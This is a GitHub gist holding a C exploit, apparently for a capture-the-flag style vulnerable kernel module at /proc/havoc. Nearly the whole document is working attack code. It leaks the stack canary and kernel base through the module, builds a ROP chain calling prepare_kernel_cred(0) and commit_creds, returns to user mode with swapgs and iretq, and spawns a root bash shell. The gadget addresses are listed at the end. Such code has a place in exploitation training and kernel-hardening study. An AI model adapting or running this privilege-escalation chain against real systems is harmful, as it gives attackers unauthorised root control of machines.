Created
February 17, 2019 15:48
-
-
Save chung96vn/227aa6c74f08ab16da8fafffede9e0a9 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/*gcc exp.c -o exp -static -no-pie*/ | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <fcntl.h> | |
#include <sys/stat.h> | |
#include <string.h> | |
#include <stdint.h> | |
#include <sys/mman.h> | |
void launch_shell(){ | |
write(1, "Welcome root shell\n", sizeof("Welcome root shell\n")); | |
execl("/bin/bash","bash",NULL); | |
} | |
unsigned long user_cs, user_ss, user_rflags; | |
static void save_state() { | |
asm( | |
"movq %%cs, %0\n" | |
"movq %%ss, %1\n" | |
"pushfq\n" | |
"popq %2\n" | |
: "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory"); | |
} | |
int main() { | |
int fp = open("/proc/havoc", O_RDWR); | |
if (fp < 0) { | |
puts("Cannot open /proc/havoc"); | |
exit(0); | |
} | |
char bufread[0x100]; | |
char bufwrite[0x100]; | |
char *tmpstack = mmap(NULL, 0x8000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, NULL); | |
if (tmpstack == MAP_FAILED) { | |
puts("Cannot mmap tmpstack"); | |
exit(0); | |
} | |
printf("tmpstack: %p\n", tmpstack); | |
read(fp, bufread, 0x100); | |
unsigned long canary = *(unsigned long *)(bufread + 1); | |
unsigned long retaddr = *(unsigned long *)(bufread + 1+8+8+8); | |
unsigned long kbase = retaddr - 0x31af11; | |
unsigned long commit_creds = kbase + 0xb5765; | |
unsigned long prepare_kernel_cred = kbase + 0xb5b15; | |
printf("canary\t\t\t: %p\n", canary); | |
printf("retaddr\t\t\t: %p\n", retaddr); | |
printf("kbase\t\t\t: %p\n", kbase); | |
printf("commit_creds\t\t: %p\n", commit_creds); | |
printf("prepare_kernel_cred\t: %p\n", prepare_kernel_cred); | |
save_state(); | |
memcpy(bufwrite, bufread, 1+8+8+8); | |
unsigned long *stack = (unsigned long *)(bufwrite + 1+8+8+8); | |
//*(stack++) = 0x6161616162626262; //test crash | |
*(stack++) = kbase + 0x838d0; //pop rdi ; ret | |
*(stack++) = 0; //rdi = 0 | |
*(stack++) = prepare_kernel_cred; //prepare_kernel_cred(0); | |
*(stack++) = kbase + (0xffffffff81461ac2 - 0xffffffff81000000); //pop r8 ; ret | |
*(stack++) = 0; //r8 = 0 | |
*(stack++) = kbase + (0xffffffff810ea1b9 - 0xffffffff81000000); //pop rdx ; ret | |
*(stack++) = 0; //rdx = 0 | |
*(stack++) = kbase + (0xffffffff81120c57 - 0xffffffff81000000); //mov rdi, rax ; cmp r8, rdx ; jne 0xffffffff81120c45 ; pop rbp ; ret | |
*(stack++) = 0; //rbp = 0 | |
*(stack++) = commit_creds; | |
*(stack++) = kbase + (0xffffffff8106d8b4 - 0xffffffff81000000); //swapgs ; pop rbp ; ret | |
*(stack++) = 0; //rbp = 0 | |
*(stack++) = kbase + (0xffffffff8103625b - 0xffffffff81000000); //iretq | |
*(stack++) = &launch_shell; | |
*(stack++) = user_cs; | |
*(stack++) = user_rflags; | |
*(stack++) = tmpstack + 0x4000; | |
*(stack++) = user_ss; | |
stack = (unsigned long *)(bufwrite + 1+8+8+8); | |
int i; | |
for (i = 0; i <= 17; i++){ | |
printf("%p\n", stack[i]); | |
} | |
printf("Payload build sucessfully!\n"); | |
printf("Do you want to attack? (Y/N) "); | |
char ans[2]; | |
fgets(ans, 2, stdin); | |
if (ans[0] == 'Y' || ans[0] == 'y') { | |
write(fp, bufwrite, 0x100); | |
} | |
return; | |
//write(fp, bufwrite, 0x100); | |
} | |
/* | |
No PIE: 0xffffffff81000000 | |
0xffffffff81120c57 : mov rdi, rax ; cmp r8, rdx ; jne 0xffffffff81120c45 ; pop rbp ; ret | |
0xffffffff81461ac2 : pop r8 ; ret | |
0xffffffff810ea1b9 : pop rdx ; ret | |
0xffffffff81882b3a : iretd ; | |
0xffffffff8106d8b4 : swapgs ; pop rbp ; ret | |
0xffffffff8103625b: 48 cf iretq | |
*/ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment